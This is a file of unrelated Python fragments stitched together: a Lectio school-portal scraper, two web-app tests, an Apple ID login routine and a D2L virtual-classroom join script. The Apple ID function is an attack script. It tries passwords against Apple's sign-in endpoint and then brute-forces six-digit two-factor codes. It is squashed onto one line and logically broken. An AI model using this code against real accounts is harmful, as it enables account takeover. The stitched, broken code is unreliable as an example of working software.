            "context_card_id": row["lectiocontextcard"],
            "team_element_id": row["lectiocontextcard"].replace("HE", ""),
            "name": teamGroups.group("team") if not teamGroups is None else "",
            "term": {
                "years_string": teamGroups.group("term") if not teamGroups is None else "",
                "value": termGroups.group("value") if not termGroups is None else ""
            }
        })
    if not rows["Saerligefokuspunkter"].find("ul") is None:
        focusRows = rows["Saerligefokuspunkter"].find("ul").findAll("li", recursive=False)
        if len(focusRows) > 0:
            for row in focusRows:
                header = unicode(row.text)
                focusPointElements = []
                if row.find_next().name == "ul":
                    for focusElement in row.find_next().findAll("li"):
                        focusPointElements.append(focusElement.text.encode("utf8"))
                focusPoints.append({
                    "header": header,
                    "elements": focusPointElements
                })
    changedGroups = changeProg.match(
        rows["Sidstaendret"].text.strip().replace("\r\n", "").replace("\t", ""))
    createdGroups = changeProg.match(
        rows["Oprettet"].text.strip().replace("\r\n", "").replace("\t", ""))
    estimate = rows["Estimat"].text.strip().replace("\r\n", "").replace(
        "\t", "").replace(" moduler", "").replace(",", ".")
    information = {
        "title": rows["Titel"].text.strip().replace("\r\n", "").replace("\t", "").encode("utf8"),
        "note": rows["Note"].text.strip().replace("\r\n", "").replace("\t", "").encode("utf8"),
        "estimate": {
            "type": "modules",
            "length": "none" if estimate == "ingen" else estimate
        },
        "changed": {
            "date": datetime.strptime(changedGroups.group("date"), "%d/%m-%Y") if not changedGroups is None else "",
            "teacher": {
                "name": unicode(changedGroups.group("teacher")) if not changedGroups is None else "",
                "abbrevation": unicode(changedGroups.group("abbrevation")) if not changedGroups is None else ""
            }
        },
        "teams": teams,
        "created": {
            "date": datetime.strptime(createdGroups.group("date"), "%d/%m-%Y") if not createdGroups is None else "",
            "teacher": {
                "name": unicode(createdGroups.group("teacher")) if not createdGroups is None else "",
                "abbrevation": unicode(createdGroups.group("abbrevation")) if not createdGroups is None else ""
            }
        },
        "periods": periods,
        "focus_points": focusPoints,
        "methods": workMethods,
        "activities": activities,
        "assignments": assignments
    }
    return {"status": "ok", "phase": information}
def test_sort_links(app_client):
    response = app_client.get("/fixtures/sortable?_sort=sortable")
    assert response.status == 200
    ths = Soup(response.body, "html.parser").findAll("th")
    attrs_and_link_attrs = [{
        "attrs": th.attrs,
        "a_href": (th.find("a")["href"].split("/")[-1] if th.find("a") else None),
    } for th in ths]
    assert [
        {"attrs": {"class": ["col-Link"], "scope": "col"}, "a_href": None},
        {"attrs": {"class": ["col-pk1"], "scope": "col"}, "a_href": None},
        {"attrs": {"class": ["col-pk2"], "scope": "col"}, "a_href": None},
        {"attrs": {"class": ["col-content"], "scope": "col"}, "a_href": None},
        {"attrs": {"class": ["col-sortable"], "scope": "col"},
         "a_href": "sortable?_sort_desc=sortable"},
        {"attrs": {"class": ["col-sortable_with_nulls"], "scope": "col"},
         "a_href": "sortable?_sort=sortable_with_nulls"},
        {"attrs": {"class": ["col-sortable_with_nulls_2"], "scope": "col"},
         "a_href": "sortable?_sort=sortable_with_nulls_2"},
        {"attrs": {"class": ["col-text"], "scope": "col"},
         "a_href": "sortable?_sort=text"},
    ] == attrs_and_link_attrs
def attempt(self, environ="PROD", appleid=None, password=None): # Retrieve the login page content loginpage = self.s.get(self.ids, allow_redirects=True) # If the status isn't HTTP_OK something must be wrong with the application if loginpage.status_code != 200: raise BaseException("Login page returned error") # Find the login soup = Soup(loginpage.text, "html.parser") form = soup.find("form", {"name": "form2"}) # Login form is named form2 # Automatically retrieve fields and set post data for requests formdata = dict() for element in form.find_all("input"): try: formdata[element["name"]] = element["value"] except Exception as exc: pass # Set the username and password if not appleid: appleid = str(input("APPLE ID: ")) if not password: password = str(input("PASSWORD: "******"appleId"] = appleid formdata["accountPassword"] = password # Apparently you can log into dev account formdata["ENV"] = environ # Authenticate with Apple print("[{}]: TRYING {}...".format(appleid, password)) authres = self.s.post( "https://idmsa.apple.com/IDMSWebAuth/authenticate", data=formdata, allow_redirects=True) # Check if login failed if "Your account information was entered incorrectly" in authres.text: print("WRONG PASSWORD") return 1 elif "Your Apple ID or password was entered incorrectly" in authres.text: print("ACCOUNT DOES NOT EXIST") return 2 # Check if 2FA code is required elif "Verify your identity" in authres.text: print("PASSWORD FOUND: {}".format(password)) print("TWO FACTOR") # Find form for 2FA code soup = Soup(authres.text, "html.parser") twofactor = soup.find( "form", {"id": "command"}) # 2FA code form has HTML id 'command' # Brute force the digits for i in range(0, 1000000): code = str( i ) # Cast to string so we can add prefix of zeroes if needed # Add prefix if needed while len(code) < 6: code = "0" + code # Set value of the digit input fields to corresponding digit from bruteforce for n in range(0, 5): formdata['digit' + str(i + 1)] = code[n] print("Trying {}".format(code), end=": ") # Try 2-FA code twofalogin = self.s.post( "https://idmsa.apple.com/IDMSWebAuth/" + twofactor['action'], data=formdata, allow_redirects=True) if "Unauthorized access detected" in twofalogin.text: print("UNAUTHORIZED ACCESS DETECTED") break # Just give up, they caught us else: break #print(twofalogin.text) elif "This Apple ID has been locked for security reasons" in authres.text: print("APPLE ID BLOCKED :(") return 2 else: print(authres.text) print("SUCCESS") return 0
def test_database_download_disallowed_for_mutable(app_client):
    response = app_client.get("/fixtures")
    soup = Soup(response.body, "html.parser")
    assert 0 == len(soup.findAll("a", {"href": re.compile(r"\.db$")}))
    assert 403 == app_client.get("/fixtures.db").status
def JoinClassroom(self):
    self.home = self.sso.Request("/d2l/home/196867")
    classroom = Soup(self.home, "lxml")
    classroom = classroom.find('d2l-menu-item-link', {"text": "Virtual Classroom"})
    self.classroom = Soup(self.sso.Request(classroom['href']), "html.parser")
    self.classroom = self.classroom.find("iframe", {"class": "d2l-iframe-offscreen"})
    self.classroom = Soup(self.sso.Request(self.classroom['src']), "html.parser")
    self.classroom = self.classroom.find("form", {"id": "LtiRequestForm"})
    bongobase = self.classroom['action']
    bongodata = {
        "launch_presentation_locale": "EN-GB",
        "tool_consumer_instance_guid": self.classroom.find("input", {"name": "tool_consumer_instance_guid"})['value'],
        "tool_consumer_instance_name": "YouSeeU",
        "tool_consumer_info_version": self.classroom.find("input", {"name": "tool_consumer_info_version"})['value'],
        "tool_consumer_info_product_family_code": "desire2learn",
        "context_id": str(self.classroom.find("input", {"name": "context_id"})['value']),
        "context_title": "Fundamentals 1",
        "context_label": str(self.classroom.find("input", {"name": "context_label"})['value']),
        "resource_link_description": "Virtual Classroom Launch",
        "lis_outcome_service_url": str(self.classroom.find("input", {"name": "lis_outcome_service_url"})['value']),
        "lti_version": str(self.classroom.find("input", {"name": "lti_version"})['value']),
        "lti_message_type": str(self.classroom.find("input", {"name": "lti_message_type"})['value']),
        "user_id": str(self.classroom.find("input", {"name": "user_id"})['value']),
        "roles": str(self.classroom.find("input", {"name": "roles"})['value']),
        "lis_person_name_given": str(self.classroom.find("input", {"name": "lis_person_name_given"})['value']),
        "lis_person_name_family": str(self.classroom.find("input", {"name": "lis_person_name_family"})['value']),
        "lis_person_name_full": str(self.classroom.find("input", {"name": "lis_person_name_full"})['value']),
        "lis_person_contact_email_primary": str(self.classroom.find("input", {"name": "lis_person_contact_email_primary"})['value']),
        "ext_d2l_tenantid": str(self.classroom.find("input", {"name": "ext_d2l_tenantid"})['value']),
        "ext_tc_profile_url": str(self.classroom.find("input", {"name": "ext_tc_profile_url"})['value']),
        "ext_d2l_context_id_history": str(self.classroom.find("input", {"name": "ext_d2l_context_id_history"})['value']),
        "ext_d2l_resource_link_id_history": str(self.classroom.find("input", {"name": "ext_d2l_resource_link_id_history"})['value']),
        "lis_result_sourcedid": str(self.classroom.find("input", {"name": "lis_result_sourcedid"})['value']),
        "ext_d2l_link_id": str(self.classroom.find("input", {"name": "ext_d2l_link_id"})['value']),
        "custom_links_outcome_service_url": str(self.classroom.find("input", {"name": "custom_links_outcome_service_url"})['value']),
        "launch_presentation_return_url": str(self.classroom.find("input", {"name": "launch_presentation_return_url"})['value']),
        "oauth_version": str(self.classroom.find("input", {"name": "oauth_version"})['value']),
        "oauth_nonce": str(self.classroom.find("input", {"name": "oauth_nonce"})['value']),
        "oauth_timestamp": str(self.classroom.find("input", {"name": "oauth_timestamp"})['value']),
        "oauth_signature_method": str(self.classroom.find("input", {"name": "oauth_signature_method"})['value']),
        "oauth_consumer_key": str(self.classroom.find("input", {"name": "oauth_consumer_key"})['value']),
        "oauth_callback": str(self.classroom.find("input", {"name": "oauth_callback"})['value']),
        # Test for XSS lmao
        "oauth_signature": str(self.classroom.find("input", {"name": "oauth_signature"})['value']),
        "ext_basiclti_submit": str(self.classroom.find("input", {"name": "ext_basiclti_submit"})['value'])
    }
    # Every input field is copied over anyway, overwriting the values above
    for el in self.classroom.find_all("input"):
        bongodata[el['name']] = el['value']
    print("Joining Virtual Classroom....")
    print(json.dumps(bongodata))
    self.classroom = self.sso.s.post(bongobase, data=bongodata, allow_redirects=True)
    s = self.classroom.text
    start = "redirectUrl = '"
    end = "';"
    self.classroom = re.search('%s(.*)%s' % (start, end), s).group(1)
    self.classroom = self.sso.s.get(self.classroom, allow_redirects=True)
    if "You need to enable" in self.classroom.text:
        print("We joined bongo, hooray. However it requires JS and I still need to reverse engineer more of Bongo in order to join the classroom")
    else:
        print("Something went wrong while joining bongo")